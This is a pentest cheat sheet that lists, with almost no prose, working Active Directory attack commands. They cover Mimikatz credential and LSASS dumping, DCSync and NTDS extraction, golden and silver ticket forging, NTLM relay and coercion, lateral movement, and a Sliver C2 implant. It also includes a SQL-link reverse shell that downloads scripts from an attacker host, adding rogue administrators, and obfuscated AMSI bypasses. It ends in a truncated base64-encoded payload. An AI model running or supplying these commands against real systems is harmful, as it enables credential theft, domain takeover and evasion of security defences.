Cheatsheets

Quick reference for common pentest commands. No fluff, just commands.

Mimikatz

Setup

1
Import-Module C:\Temp\Invoke-Mimikatz.ps1

Dump Credentials

1
2
3
4
5
6
7
8
9
10
11
12
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
Invoke-Mimikatz -Command '"lsadump::sam"'
Invoke-Mimikatz -Command '"lsadump::cache"'
Invoke-Mimikatz -Command '"vault::cred /patch"'

# LSASS MiniDump (stealthier)
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full
sekurlsa::minidump C:\Temp\lsass.dmp
sekurlsa::logonpasswords

# Remote dump
Invoke-Mimikatz -DumpCreds -ComputerName <target>

Pass-the-Hash / Ticket

1
2
3
4
5
6
7
8
# PTH
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:corp.local /ntlm:<HASH> /run:powershell.exe"'

# Export & inject ticket
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Invoke-Mimikatz -Command '"kerberos::ptt .\ticket.kirbi"'
klist          # view tickets
klist purge    # clear tickets

DCSync

1
2
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:corp\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /all /csv"'

Bypass LSA Protection

1
2
3
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL  # check
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove

Golden / Silver Ticket

1
2
3
4
5
# Golden
Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:<SID> /krbtgt:<HASH> /user:Administrator /id:500 /ptt"'

# Silver (CIFS)
Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:<SID> /target:<TARGET> /service:CIFS /rc4:<HASH> /user:Administrator /ptt"'

AD Enumeration

AD Module

1
2
3
4
5
6
7
Get-ADUser -Filter * | Select -ExpandProperty samaccountname
Get-ADComputer -Filter * | select -expand name
Get-ADGroup -Identity 'Domain Admins' -Properties *
Get-ADGroupMember -Identity 'Domain Admins'
Get-ADTrust -Filter *
(Get-ADForest).Domains
Get-ACL 'AD:\CN=Domain Admins,CN=Users,DC=corp,DC=local' | select -ExpandProperty Access

PowerView — Domain

1
2
3
4
5
6
7
8
9
10
. ./PowerView.ps1
Get-NetDomain
Get-DomainSID
Get-NetDomainController
Get-NetUser | select samaccountname
Get-NetUser -AdminCount 1
Get-NetGroup
Get-NetGroupMember -GroupName "Domain Admins"
Get-NetComputer
Get-NetDomainTrust

PowerView — GPO

1
2
3
4
5
6
7
8
9
Get-DomainGPO | select displayname
Get-DomainGPOLocalGroup
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity <computer>
Get-DomainGPOUserLocalGroupMapping -Identity <user>
Get-DomainOU
(Get-DomainOU -Identity DevOps).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

# GPP - find cpassword
findstr /S /I cpassword \\dc.corp.local\sysvol\corp.local\policies\*.xml

PowerView — ACL

1
2
3
4
5
6
7
8
9
10
11
Get-ObjectACL -SamAccountName <account> -ResolveGUIDS
Invoke-ACLScanner -ResolveGUIDs | select IdentityReference, ObjectDN, ActiveDirectoryRights

# Check DCSync rights
Get-ObjectAcl -DistinguishedName "dc=corp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "<user>") -and ($_.ObjectType -match 'replication')}

# Check GenericAll on Domain Admins
Get-ObjectAcl -SamaccountName "Domain Admins" -ResolveGUIDS | ?{$_.identityReference -match '<user>'}

# Add DCSync rights
Add-ObjectAcl -TargetDistinguishedName 'DC=corp,DC=local' -PrincipalSamAccountName <user> -Rights DCSync -Verbose

BloodHound

1
2
3
4
5
. ./sharphound.ps1
Invoke-Bloodhound -CollectionMethod All -Verbose
Invoke-BloodHound -Stealth
Invoke-Bloodhound -CollectionMethod LoggedOn -Verbose
SharpHound.exe --Stealth

Sessions & Admin Access

1
2
3
4
5
Find-LocalAdminAccess -Verbose
Invoke-UserHunter -Groupname "Domain Admins"
Invoke-UserHunter -CheckAccess
. ./Invoke-SessionHunter.ps1
Invoke-SessionHunter -FailSafe

Kerberos Attacks

Kerberoast

1
2
3
4
Get-NetUser -SPN | select samaccountname, serviceprincipalname
Request-SPNTicket "MSSQLSvc/dc.corp.local"
Invoke-Mimikatz -Command '"Kerberos::list /export"'
hashcat -m 13100 hash.txt rockyou.txt

AS-REP Roast

1
2
3
Get-DomainUser -PreauthNotRequired | select samaccountname
Invoke-ASREPRoast -Verbose | fl
hashcat -a 0 -m 18200 hash.txt rockyou.txt

Unconstrained Delegation

1
2
3
4
Get-Netcomputer -UnConstrained | select samaccountname
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Invoke-Mimikatz -Command '"kerberos::ptt <kirbi>"'

Constrained Delegation

1
2
3
4
5
6
7
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto
Get-Domaincomputer -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

# kekeo
Tgt::ask /user:<user> /domain:<domain> /rc4:<hash>
Tgs::s4u /tgt:<tgt> /user:Administrator@<domain> /service:cifs/dc.corp.local
Invoke-Mimikatz -Command '"kerberos::ptt <kirbi>"'

Child to Parent (Trust Escalation)

1
2
3
4
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -Computername <dc>

# Golden Ticket with SID history
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<child> /sid:<child_sid> /sids:<parent_sid>-519 /krbtgt:<hash> /ticket:trust.kirbi"'

Lateral Movement

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# PSRemoting
Enter-PSSession -Computername <target>
$sess = New-PSSession -Computername <target>
Invoke-Command -Computername <target> -Scriptblock {whoami}
Invoke-Command -FilePath <script> $sess

# WinRS (more opsec)
winrs -r:<target> -u:<domain>\<user> -p:<pass> cmd

# Load remote script
iex (iwr http://<ip>/script.ps1 -UseBasicParsing)

# Copy file to remote
Copy-Item .\tool.ps1 \\<target>\c$\'Program Files'

# runas
runas /netonly /user:domain\user cmd.exe

# Add local admin + enable RDP
net user <user> <pass> /add /Y && net localgroup administrators <user> /add && net localgroup "Remote Desktop Users" <user> /add && reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

NTLM Relay

1
2
3
4
5
6
7
8
9
10
11
# 1. Disable SMB/HTTP/LDAP in /etc/responder/Responder.conf, then:
responder -dvw -I eth0

# 2. Find targets without SMB signing
nxc smb --gen-relay-list smb_targets.txt 10.10.10.0/24

# 3. Relay
impacket-ntlmrelayx -socks -smb2support -tf smb_targets.txt

# 4. Configure /etc/proxychains4.conf -> socks5 127.0.0.1 1080
proxychains4 nxc smb <IP> -u <user> -d <domain>

PrinterBug (MS-RPRN)

1
2
3
4
5
6
7
8
# Check if spooler is running
nxc smb <targets> -u user -p password -M spooler

# Force DC authentication to attacker machine
python3 printerbug.py '<DOMAIN>/<User>@<DC_IP>' <attacker_IP>

# Catch with ntlmrelayx (relay to target without SMB signing)
impacket-ntlmrelayx -t smb://<target> -socks -smb2support

Golden Ticket

1
2
3
4
5
6
7
8
9
# Get krbtgt hash and domain SID on DC
privilege::debug
lsadump::lsa /inject /name:krbtgt

# Forge ticket
kerberos::golden /User:Administrator /domain:corp.local /sid:<SID> /krbtgt:<HASH> /id:500 /ptt

# Open session
misc::cmd

NTDS Dump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# VSS - vssadmin
vssadmin create shadow /for=C:
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit" C:\Temp\
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM" C:\Temp\
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

# diskshadow
diskshadow
  set context persistent nowriters
  add volume C: alias myshadow
  create
  expose %myshadow% Z:

# ntdsutil
ntdsutil "ac i ntds" "ifm" "create full c:\temp\dump" q q

# Remote secretsdump
secretsdump.py domain/user:pass@<DC_IP>

# NetExec
nxc smb <DC_IP> -u user -p pass --ntds

LAPS

1
2
3
4
5
6
7
8
9
# LAPSv1 - password stored in cleartext attribute
Get-ADComputer <machine> -Properties ms-MCS-AdmPwd | select ms-MCS-AdmPwd

# Windows LAPS - encrypted
Get-ADComputer <machine> -Properties msLAPS-Password | select msLAPS-Password

# NetExec
nxc smb <target> -u user -p pass -M laps
nxc ldap <DC> -u user -p pass -M laps

Token Impersonation

1
2
3
4
5
6
7
8
# In Meterpreter
load incognito
list_tokens -u
impersonate_token "DOMAIN\Administrator"

# Add user to Domain Admins via token
add_user hacker Password123! -h <DC_IP>
add_group_user "Domain Admins" hacker -h <DC_IP>

SLIVER C2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Install & start
curl https://sliver.sh/install | sudo bash
sudo apt install mingw-w64
sliver

# Listener
mtls --lhost <attacker_IP> --lport 443

# Generate implants
generate beacon --mtls <attacker_IP> --os windows --arch amd64 --format exe --save /tmp/implant.exe
generate --mtls <attacker_IP> --os linux --arch amd64 --format elf --save /tmp/implant

# Interact
sessions
use <session_id>
whoami
shell

# Armory
armory install seatbelt
armory install rubeus

SMB Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
# Nmap
nmap --open -p 139,445 <range>
nmap --script smb-protocols -p 445 <IP>
nmap --script smb-vuln* -p 445 <IP>

# Linux
smbclient -L //<IP>
enum4linux <IP> -a
nxc smb <IP> --shares
nxc smb <IP> --shares -u '' -p ''                    # anonymous
nxc smb <IP> --shares -u guest -p guest              # guest
nxc smb <IP> --shares -u user -p pass -d domain      # authenticated
1
2
3
# Windows
net view \\<IP>
Get-SMBShare -ComputerName <target>

Wmiexec

1
2
3
4
# Impacket
impacket-wmiexec domain/user:password@<IP>
impacket-wmiexec domain/user@<IP> -hashes :<NTLM_HASH>
proxychains4 impacket-wmiexec domain/user:password@<IP>
1
2
3
# Native WMI
Invoke-WmiMethod -ComputerName <target> -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\out.txt"
Get-WmiObject -Class win32_operatingsystem -ComputerName <target>

Rubeus

Ask TGT

1
2
3
4
5
# With AES256 key (OPSEC)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:<user> /aes256:<AES_KEY> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# With certificate (PFX)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt

Golden Ticket (OPSEC / evasive)

1
2
3
4
5
6
7
8
# Generate OPSEC-friendly command (auto-fetches params via LDAP)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:<AES_KEY> /sid:<DOMAIN_SID> /ldap /user:Administrator /printcmd

# Forge + inject golden ticket
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:<AES_KEY> /user:Administrator /id:500 /domain:corp.local /sid:<SID> /ptt

# Inter-realm golden ticket (with SID history for Enterprise Admins)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /user:Administrator /id:500 /domain:<child_domain> /sid:<child_sid> /sids:<parent_sid>-519 /aes256:<krbtgt_aes> /netbios:<short_domain> /ptt

Silver Ticket (evasive)

1
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/<DOMAIN> /rc4:<HASH> /sid:<SID> /sids:<PARENT_SID>-519 /ldap /user:Administrator /nowrap

S4U (Constrained Delegation abuse)

1
2
3
4
5
6
7
8
# User account
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:<user> /aes256:<AES_KEY> /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.corp.local" /ptt

# Computer account with altservice (service class swap)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-adminsrv$ /aes256:<AES_KEY> /impersonateuser:Administrator /msdsspn:time/dcorp-dc.corp.local /altservice:ldap /ptt

# RBCD abuse
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:student$ /aes256:<AES_KEY> /msdsspn:http/<target> /impersonateuser:administrator /ptt

Monitor (capture TGTs — Unconstrained Delegation)

1
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args monitor /targetuser:DCORP-DC$ /interval:5 /nowrap

Pass-the-Ticket

1
2
3
4
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args ptt /ticket:<base64_ticket>

# Ask TGS from ticket
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:http/mcorp-dc.CORP.LOCAL /dc:mcorp-dc.CORP.LOCAL /ptt /ticket:<base64_ticket>

RBCD

Identify write permissions

1
Find-InterestingDomainACL | ?{$_.identityreferencename -match '<user>'}

Configure RBCD

1
2
Set-DomainRBCD -Identity <target_computer> -DelegateFrom '<domain>\<controlled_computer>$' -Verbose
Get-DomainRBCD  # verify

Extract keys and exploit

1
2
3
4
5
6
7
8
# Extract AES keys of controlled computer account
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -args "sekurlsa::evasive-keys" "exit"

# Abuse S4U2Self + S4U2Proxy
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:<computer>$ /aes256:<AES_KEY> /msdsspn:http/<target> /impersonateuser:administrator /ptt

# Access
winrs -r:<target> cmd

AD CS — ESC1 / ESC3

Enumerate

1
2
3
4
C:\AD\Tools\Certify.exe cas                        # find CAs
C:\AD\Tools\Certify.exe find                       # all templates
C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject  # ESC1 candidates
C:\AD\Tools\Certify.exe find /vulnerable           # ESC3 candidates

ESC1 — Enroll as any user (ENROLLEE_SUPPLIES_SUBJECT)

1
2
3
4
5
6
7
8
# Request cert for Domain Admin
C:\AD\Tools\Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:"<TEMPLATE>" /altname:administrator

# Convert to PFX
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx

# Get TGT
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt

ESC3 — Enrollment Agent abuse

1
2
3
4
5
6
7
8
9
# Step 1 - Get Enrollment Agent cert
C:\AD\Tools\Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:SmartCardEnrollment-Agent
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-agent.pfx

# Step 2 - Request cert on behalf of Domain Admin
C:\AD\Tools\Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123

# Step 3 - Get TGT
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc3-DA.pfx /password:SecretPass@123 /ptt

SQL Server Abuse

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1

# Discover SQL instances
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

# Check connectivity
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

# Enumerate links
Get-SQLServerLink -Instance <sql_instance> -Verbose
Get-SQLServerLinkCrawl -Instance <sql_instance> -Verbose

# Execute commands via xp_cmdshell
Get-SQLServerLinkCrawl -Instance <sql_instance> -Query "exec master..xp_cmdshell 'whoami'"

# Target specific DB
Get-SQLServerLinkCrawl -Instance <sql_instance> -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget <target_db>

# OPENQUERY pivot
select * from openquery("DCORP-SQL1",'select * from master..sysservers')

# Enable xp_cmdshell
Execute('sp_configure "xp_cmdshell",1;reconfigure;') AT "<sql_instance>"

# Reverse shell via SQL link
Get-SQLServerLinkCrawl -Instance <sql_instance> -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://<ip>/amsibypass.txt);iex (iwr -UseBasicParsing http://<ip>/Invoke-PowerShellTcp.ps1)"''' -QueryTarget <target>

GPO Abuse

Enumerate

1
2
3
4
Get-DomainGPO -Identity 'DevOps Policy'
Get-DomainGPO | select displayname
# Check GenericAll / WriteDACL on a GPO
Find-InterestingDomainACL | ?{$_.identityreferencename -match '<user>'}

NTLM Relay to LDAP → modify GPO DACL

1
2
3
4
5
6
7
8
9
10
11
12
13
# Listener (Ubuntu WSL)
sudo ntlmrelayx.py -t ldaps://<DC_IP> -wh <attacker_IP> --http-port '80,8080' -i --no-smb-server

# Trigger authentication (force target to auth to attacker)
powershell.exe -Command "Invoke-WebRequest -Uri 'http://<attacker_IP>' -UseDefaultCredentials"
# Or copy a malicious .lnk to a monitored share
xcopy C:\AD\Tools\student.lnk \\<target>\<share>

# Connect to LDAP shell
nc 127.0.0.1 11000

# Grant write rights on GPO
write_gpo_dacl <user> {<GPO_GUID>}

GPOddity — inject malicious GPO

1
2
3
4
5
6
7
8
9
10
sudo python3 gpoddity.py \
  --gpo-id '<GPO_GUID>' \
  --domain '<domain>' \
  --username '<user>' \
  --password '<pass>' \
  --command 'net localgroup administrators <user> /add' \
  --rogue-smbserver-ip '<attacker_IP>' \
  --rogue-smbserver-share '<share_name>' \
  --dc-ip '<DC_IP>' \
  --smb-mode none

Host the malicious GPT

1
2
3
4
5
6
7
# Linux (WSL)
mkdir /mnt/c/AD/Tools/stdx-gp
cp -r GPT_Out/* /mnt/c/AD/Tools/stdx-gp

# Windows - create share
net share stdx-gp=C:\AD\Tools\stdx-gp /grant:Everyone,Full
icacls "C:\AD\Tools\stdx-gp" /grant Everyone:F /T

Force GPO refresh

1
2
winrs -r:<target> cmd
gpupdate /force

Coercion Methods

PrinterBug (MS-RPRN)

1
2
C:\AD\Tools\MS-RPRN.exe \\<target_dc> \\<attacker_listener>
python3 printerbug.py '<domain>/<user>@<DC_IP>' <attacker_IP>

Windows Search Protocol (MS-WSP)

1
C:\AD\Tools\Loader.exe -path C:\AD\tools\WSPCoerce.exe -args <target_dc> <attacker_listener>

DFS Protocol (MS-DFSNM)

1
C:\AD\Tools\DFSCoerce-andrea.exe -t <target_dc> -l <attacker_listener>

Trust Key / Inter-Domain Escalation

Extract trust key (from DC)

1
2
3
4
5
6
7
8
9
# Copy loader to DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd

# Setup portproxy to fetch tools
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<attacker_IP>

# Extract trust key
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"

Forge inter-realm ticket (trust key method — ESC18 style)

1
2
3
4
5
6
7
8
# Silver ticket with SID history
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/<CHILD_DOMAIN> /rc4:<trust_key_rc4> /sid:<child_sid> /sids:<parent_sid>-519 /ldap /user:Administrator /nowrap

# Request TGS for parent DC
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:http/mcorp-dc.<PARENT_DOMAIN> /dc:mcorp-dc.<PARENT_DOMAIN> /ptt /ticket:<base64_ticket>

# Access parent DC
winrs -r:mcorp-dc.<parent_domain> cmd

Golden ticket method (krbtgt hash)

1
2
3
4
5
6
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /user:Administrator /id:500 /domain:<child_domain> /sid:<child_sid> /sids:<parent_sid>-519 /aes256:<krbtgt_aes> /netbios:<short_domain> /ptt

winrs -r:mcorp-dc.<parent_domain> cmd

# DCSync against parent domain
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:mcorp\krbtgt /domain:<parent_domain>" "exit"

Misc / OPSEC

Invisi-Shell (bypass enhanced logging)

1
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

AppLocker bypass

1
2
3
4
5
6
7
8
9
10
11
12
13
# Check AppLocker
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$ExecutionContext.SessionState.LanguageMode

# %PROGRAMFILES%\* is usually allowed — drop scripts there
Copy-Item .\script.ps1 \\<target>\C$\'Program Files'

# Disable via GPO if you have GenericAll
runas /user:<domain>\<user> /netonly cmd
gpmc.msc  # delete Executable Rules
winrs -r:<target> cmd
gpupdate /force

Portproxy (pivot for tool hosting)

1
2
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<attacker_IP>
# Then load tools via http://127.0.0.1:8080/<tool>

AMSI Bypass

1
2
3
4
5
6
7
8
9
10
11
12
13
Set-Item ('Va'+'rI'+'a'+'blE:1'+'q2'+'uZx') ([TYpE]("F"+'rE')) 
(Get-variable (('1Q'+'2U') +'zX'))."A`ss`Embly"."GET`TY`Pe"(('Uti'+'l','A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em'))).g`etf`iElD"(('a'+'msi'),'d',('I'+'nitF'+'aile'))).(sE`T`VaLUE)(${n`ULl},${t`RuE})


sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

$v=[Ref].Assembly.GetType('System.Management.Automation.Am' + 'siUtils'); $v."Get`Fie`ld"('ams' + 'iInitFailed','NonPublic,Static')."Set`Val`ue"($null,$true)

S`eT-It`em ( 'V'+'aR' +  'IA' + (("{1}{0}"-f'1','blE:')+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a'))  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Invoke-Command -Scriptblock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )} $sess

Invoke-Command ([scriptblock]::Create([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('JABrADgAVgBRADMAIAA9ACAAWwBTAFQAUgBpAE4AZwBdADoAOgBKAG8AaQBuACgAJwAnACwAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAYgB5AHQAZQBbAF0AXQAoADAAeAA1ADMALAAwAHgANwA5ACkAKQApACwAIgAkACgAWwBjAGgAYQByAF0AMAB4ADcAMwApACQAKABbAGMAaABhAHIAXQAwAHgANwA0ACkAJAAoAFsAYwBoAGEAcgBdADAAeAA2ADUAKQAkACgAWwBjAGgAYQByAF0AMAB4ADYARAApACQAKABbAGMAaABhAHIAXQAwAHgAMgBFACkAIgAsACQAKAAkAGsAMwA3ADcANAA9ACcANABDAHYAKAA8ADkAJwA7ACQAYgA9AFsAYgB5AHQAZQBbAF0AXQAoADAAeAA3ADkALAAwAHgAMgAyACwAMAB4ADEAOAApADsAJABrAGIAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABrADMANwA3ADQAKQA7AC0AagBvAGkAbgAoADAALgAuACgAJABiAC4ATABlAG4AZwB0AGgALQAxACkAfAAlAHsAWwBjAGgAYQByAF0AKAAkAGIAWwAkAF8AXQAtAGIAeABvAHIAJABrAGIAWwAkAF8AJQAkAGsAYgAuAEwAZQBuAGcAdABoAF0AKQB9ACkAKQAsACIAJAAoAFsAYwBoAGEAcgBdADAAeAA2ADEAKQAkACgAWwBjAGgAYQByAF0AMAB4ADYANwApACQAKABbAGMAaABhAHIAXQAwAHgANgA1ACkAJAAoAFsAYwBoAGEAcgBdADAAeAA2AEQAKQAkACgAWwBjAGgAYQByAF0AMAB4ADYANQApACQAKABbAGMAaABhAHIAXQAwAHgANgBFACkAJAAoAFsAYwBoAGEAcgBdADAAeAA3ADQAKQAkACgAWwBjAGgAYQByAF0AMAB4ADIARQApACQAKABbAGMAaABhAHIAXQAwAHgANAAxACkAJAAoAFsAYwBoAGEAcgBdADAAeAA3ADUAKQAkACgAWwBjAGgAYQByAF0AMAB4ADcANAApACIALAAkACgAJABrADMAMwAyADEAPQAnAHMALgA5AHYAZAA6AD0AZAA6AFQAPgAnADsAJABiAD0AWwBiAHkAdABlAFsAXQBdACgAMAB4ADEAQwAsADAAeAA0ADMALAAwAHgANQA4ACwAMAB4ADAAMgAsADAAeAAwAEQALAAwAHgANQA1ACwAMAB4ADUAMwAsADAAeAA0AEEALAAwAHgANwBCACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsAMwAzADIAMQApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACwAJAAoACQAawAxADAAMAA4AD0AJwBSAGIAUwBXAFgAUwA6AHgAcABGACcAOwAkAGIAPQBbAGIAeQB0AGUAWwBdAF0AKAAwAHgAMwBGACwAMAB4ADEAMQAsADAAeAAzAEEALAAwAHgAMAAyACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsAMQAwADAAOAApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACwAJAAoACQAawA3ADIAOAA5AD0AJwBSAG4AKQByADcAMgB2AFsAJwA7ACQAYgA9AFsAYgB5AHQAZQBbAF0AXQAoADAAeAAyADYALAAwAHgAMAA3ACwAMAB4ADQANQAsADAAeAAwADEAKQA7ACQAawBiAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAawA3ADIAOAA5ACkAOwAtAGoAbwBpAG4AKAAwAC4ALgAoACQAYgAuAEwAZQBuAGcAdABoAC0AMQApAHwAJQB7AFsAYwBoAGEAcgBdACgAJABiAFsAJABfAF0ALQBiAHgAbwByACQAawBiAFsAJABfACUAJABrAGIALgBMAGUAbgBnAHQAaABdACkAfQApACkAKQA7ACAAJABoAG4AUgBBADMAagBFAFMAIAA9ACAAWwBTAFQAUgBJAG4AZwBdADoAOgBKAG8AaQBuACgAJwAnACwA